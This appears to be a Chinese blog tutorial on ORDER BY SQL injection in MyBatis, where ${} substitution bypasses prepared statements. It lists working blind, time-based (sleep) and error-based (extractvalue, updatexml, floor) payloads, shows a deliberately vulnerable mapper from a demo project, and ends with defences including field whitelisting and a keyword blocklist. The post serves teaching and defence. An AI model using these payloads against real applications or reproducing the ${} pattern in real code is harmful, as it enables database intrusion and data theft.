order by 注入方式
直接从mybatis框架的注入说起吧
在mybatis中的,使用#包裹的字段在内部进行了预编译处理,而$并没有使用预编译,也就是原生jdbc中
prepareStatement和Statement的区别。
关于order by,当注入点在后面时,是不能连接union的,例如:
select * from users order by user;
1.png
2.png
在SQL中是不允许union直接跟在order by后面的,所以我们可以考虑使用盲注或报错注入。
利用盲注,也就是看返回值
已知字段
使用if条件句,if(1=1,id,user),if函数三个占位,1=1为表达式,也是后续注入主要利用的地方,表达式为真返回以id排序,为假返回user排序,而真假返回的查询结果是不一样的,所以可以通过这种方式注入。
4.png
其他的利用方式还有:
select * from users order by (case when (1=1) then user else id end ); //根据user排序
select * from users order by (case when (1=2) then user else id end ); //根据id排序
select * from users order by ifnull(null,user);
select * from users order by ifnull(null,id);
select * from users order by rand(1=1);
select * from users order by rand(1=2);
未知字段
在实际注入时,可能字段并不是我们提前知道的,那么可能就需要用另外的方式了。
同样以if()为例,只需要改下第三个参数使其查询报错select 1 union select 2,第二个参数也需要改为1(true),之前因为没改导致运行时mysql崩了,甚至连mysql服务都给我干关闭了。。。
5.png
同样的方式还有:
select * from users order by if(1=1,1,(select 1 from information_schema.tables));
select * from users order by if(1=2,1,(select 1 from information_schema.tables));
select * from users order by (select 1 regexp if(1=1,1,0x00)); //正则表达式
select * from users order by (select 1 regexp if(1=2,1,0x00)); //0x00为空导致报错
select * from users order by (select if((ascii(substr(current,1,1))<0),1,sleep(2)) from (select user() as current) as tb1); //利用sleep延时注入
在使用sleep延时注入需要注意不能直接简单sleep(x),这样实际延时的时间将会是x乘以表内列的字段数量,例如我这里延时2*3秒。
6.png
利用报错函数
报错注入的条件是需要服务端代码中将SQL报错语句输出。
主要是利用extractvalue和updatexml
7.png
select * from users order by extractvalue(1,(select concat(0x7e,user())));
select * from users order by updatexml(1,(select concat(0x7e,user())),1);
select * from users order by (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a); //floor报错注入,Duplicate key
安全问题
在mybatis中无论是使用xml或者注解编写SQL语句时,都是推荐结合#使用,因为内部使用了预编译,然而在一些特殊场景我们并不能这般,如在like后直接使用#包裹变量在运行时是会报错的,推荐的写法是concat('%',#{q},'%')。
这里推荐一个安全检测插件:MomoSec 可以初步检测一些安全问题
[图片上传失败...(image-2b9064-1701939924348)]
order by 在mybatis中同样不能直接使用#包裹,因为order by后跟的往往是字段名,而预编译在对一个参数使用时会加上引号,字段名是不能加引号的,否则会失去本来的意思;如 order by id ==> order by 'id' ,这也是为什么在排序的位置通常会存在sql注入。
关于order by 并没有很好的解决方案,所以预编译也不是完全安全的,在防御时还应使用其他方法做好防御,如waf和filter。
案例
代码直接使用的这个项目:Hello-Java-Sec
@GetMapping("/vul/order")
public List<User> orderBy(String field, String sort) {
log.info("[vul] mybaits: order by " + field + " " + sort);
return userMapper.orderBy(field, sort);
UserMapper.xml
<select id="orderBy" resultType="com.best.hello.entity.User">
select *
from users
order by ${field} ${sort}
</select>
因为未知列名,使用盲注:结果输出不同
[图片上传失败...(image-a3928e-1701939924347)]
[图片上传失败...(image-962b5d-1701939924347)]
常规的盲注了,python写个脚本即可
[图片上传失败...(image-1627c4-1701939924347)]
上面使用的盲注,springboot项目是默认有报错页面的,所以报错注入也可以
那么代码中是如何防御的呢?
实际上他是在xml中固定化了传入参数,id或user,也就没办法注入了。
8.png
但是有个问题,当表内字段很大时我们不可能写很多复杂的匹配判断,所以可以写个filter或waf函数,过滤掉危险字符,所有的用户输入都经过函数过滤也是一种不错的方式。
/**
* SQL注入检测
*/
public static boolean checkSql(String content) {
String[] black_list = {"'", ";", "--", "+", ",", "%", "=", ">", "<", "*", "(", ")", "and", "or", "exec", "insert", "select", "delete", "update", "count", "drop", "chr", "mid", "master", "truncate", "char", "declare"};
for (String s : black_list) {
if (content.toLowerCase().contains(s)) {
return true;
}
}
return false;
}
小结
order by注入一直是容易被面试官问到的点,我也是简单做了总结。
在后期的学习中还是需要多跟着代码走,一味的复现靶场环境好像学到的东西真的挺少的。
网友评论